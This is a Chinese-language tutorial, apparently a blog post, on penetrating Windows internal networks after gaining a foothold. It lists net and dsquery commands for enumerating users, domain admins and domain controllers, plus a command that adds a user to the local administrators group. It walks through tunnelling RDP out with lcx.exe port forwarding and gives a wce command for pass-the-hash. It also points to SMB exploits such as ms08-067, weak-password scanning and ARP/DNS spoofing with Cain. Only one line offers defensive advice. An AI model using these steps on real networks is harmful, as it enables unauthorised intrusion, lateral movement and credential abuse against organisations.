内网渗透基础(二)

0X00
A 本机信息收集
用户列表(本机用户,邮件用户)
进程列表(杀软、安去监控、邮件客户端、vpn等)
服务列表
端口列表(这个在内网中比较准确的)
补丁列表(分析是否打过补丁)
本机共享(本机的域共享列表、权限)
用户习惯(历史记录,文档,照片)
B 扩散信息收集

利用本机获取内网中其他机器信息
收集ad库信息
0X01 常用信息收集命令
net user —>本机用户列表
net view —>查询同一域内机器列表
net localgroup administrators —>查看本机管理员
net user /domain —>查看域用户
net group /domain —>查看域里面的工作组
net group “domain admins” /domain —>查询域管理员用户组
net localgroup administrators /domain —>登录本机域管理员
net localgroup administators workgroup\user /add —>域用户添加到本机
net group “Domain controllers” —>查看域控制器

Dsquery命令
dsqury computer domainroot -limit 65535&&net group “domain computers” /domain —>列出域内所有机器名
dsquery user domainroot -limit 65535 && net user /domain —>列出域内所有用户名
dsquery subnet —>列出域内网段划分
dsquery group && net group /domain —>列出该域内分组
dsquery ou —>列出该域内组织单位
dsquery server &&net time /domain 列出dc
net group “domain admins” /domain —>列出管理员账号

0X01 内网渗透方法
A 端口转发:因为外网无法直接访问内网,所以可以通过端口转发技术实现。
端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端口。
使用的工具:lcx.exe(类似的工具还有很多)
使用方法:1. 先将lcx.exe上传到目标机器,执行lcx –slave “远程ip” 666 “本机ip” 3389 //表示将本机IP地址的3389端口转发到远程地址的666端口.
2.在本机执行 lcx -listen 666 3389 //在本机监听666端口
3.当看见有数据进行传输时,说明成功的,如果失败,检查端口是否被占用(netstat -an | find “666”),在本地运行mstsc,输入127.0.0.1连接,输入用户名,密码即可连接。
B hash的介绍及破解
C hash注入及防御
工具我介绍一款,wce,命令:”wce -s hash” msf里面也有。
D windows网络服务的攻击
经典案例: ‘ms08-067’ 以及前阵子的smb 445,这个我只想着内网,没想外网。
常用工具:hscan、xscan、msf的smb_login对smb进行弱口令扫描等
E 还有一些第三方服务的弱口令,mysql,sql server,tomcat等。
F 使用cain进行arp欺骗和dns欺骗,cain使用教程这个动静比较大,不是特别推荐。
防护建议:安全人员的意识要提高,加固自己的系统,比如装一个入侵检测系统,对域进行合理严格的划分。

打赏wing!